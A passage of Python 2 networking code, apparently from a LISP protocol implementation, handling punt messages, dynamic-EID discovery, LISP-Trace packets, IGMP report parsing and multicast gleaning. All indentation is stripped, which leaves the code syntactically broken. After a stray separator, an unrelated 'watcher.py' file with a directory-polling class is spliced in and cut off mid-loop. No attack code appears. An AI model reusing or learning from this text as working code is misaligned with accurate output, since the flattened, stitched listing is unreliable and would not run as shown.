# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#------------------------------------------------------------------------------
|
watcher.py | # ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import time
from traits.api import Str, Event
# ============= standard library imports ========================
from threading import Thread
from glob import glob
import os
# ============= local library imports ==========================
from pychron.loggable import Loggable
class DirectoryWatcher(Loggable):
_path = Str
_alive = False
dir_changed = Event
def __init__(self, path, *args, **kw):
super(DirectoryWatcher, self).__init__(*args, **kw)
self._path = path
def start(self):
self._start()
def stop(self):
self._alive = False
def _start(self):
self.info('start polling {} for changes'.format(self._path))
self._alive = True
t = Thread(target=self._poll)
t.start()
def _poll(self):
period = 1
while 1:
if not self._alive:
break
